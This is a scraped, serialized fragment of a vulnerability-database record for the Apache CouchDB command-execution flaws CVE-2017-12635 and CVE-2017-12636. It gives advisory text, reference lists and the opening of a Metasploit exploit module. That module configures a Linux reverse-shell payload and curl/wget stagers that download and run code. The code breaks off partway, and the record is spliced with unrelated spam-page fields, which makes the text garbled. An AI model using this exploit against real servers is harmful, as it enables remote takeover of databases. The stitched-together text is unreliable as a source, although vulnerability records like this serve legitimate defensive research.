";s:4:"text";s:5736:"It\u2019s sort of like a big key-value store for JSON blobs (\u201cdocuments\u201d), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. ", "modified": "2019-10-03T00:03:00", "id": "CVE-2017-12635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "published": "2017-11-14T20:29:00", "title": "CVE-2017-12635", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:56:26", "bulletinFamily": "exploit", "description": "There was a vulnerability in CouchDB caused by a discrepancy between the database\u2019s native JSON parser and the Javascript JSON parser used during document validation. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\n", "published": "2018-03-27T09:43:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html", "http://docs.couchdb.org/en/latest/cve/2017-12636.html", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "lastseen": "2020-07-28T21:57:35", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2020-07-28T21:57:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12635", "CVE-2017-12636"]}, {"type": 
"seebug", "idList": ["SSV:96869"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873892", "OPENVAS:1361412562310873886", "OPENVAS:1361412562310107259", "OPENVAS:1361412562310891252", "OPENVAS:1361412562310107258", "OPENVAS:1361412562310873893", "OPENVAS:1361412562310873882"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:147295", "PACKETSTORM:148273"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1252-1:853FC"]}, {"type": "exploitdb", "idList": ["EDB-ID:44498", "EDB-ID:45019", "EDB-ID:44913"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1252.NASL", "GENTOO_GLSA-201711-16.NASL", "FEDORA_2017-A20D92573B.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-30608", "1337DAY-ID-30226", "1337DAY-ID-29083", "1337DAY-ID-30713"]}, {"type": "gentoo", "idList": ["GLSA-201711-16"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FE23A23D6F2682CE0AFF06B76414F327", "EXPLOITPACK:A9E6BFA0E5E6880671080D586B43B822"]}, {"type": "freebsd", "idList": ["1E54D140-8493-11E8-A795-0028F8D09152"]}, {"type": "canvas", "idList": ["COUCHDB_ROLES"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/COUCHDB/COUCHDB_ENUM"]}], "modified": "2020-07-28T21:57:35", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_couchdb_cmd_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\n 'Description' => %q{\n CouchDB administrative users can configure the database server via HTTP(S).\n Some of the configuration options 
include paths for operating system-level binaries that are subsequently launched by CouchDB.\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\n including downloading and executing scripts from the public internet.\n },\n 'Author' => [\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\n 'Green-m ' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2017-12636'],\n ['CVE', '2017-12635'],\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\n ],\n 'DisclosureDate' => 'Apr 6 2016',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'curl'\n },\n 'CmdStagerFlavor' => ['curl', 'wget'],\n 'Targets' => [\n ['Automatic', {}],\n ['Apache CouchDB version 1.x', {}],\n ['Apache CouchDB version 2.x', {}]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(5984),\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. ";s:7:"keyword";s:40:"Apache CouchDB _config Command Execution";s:5:"links";s:5445:"Pompano Jig With Teaser,
";s:7:"expired";i:-1;}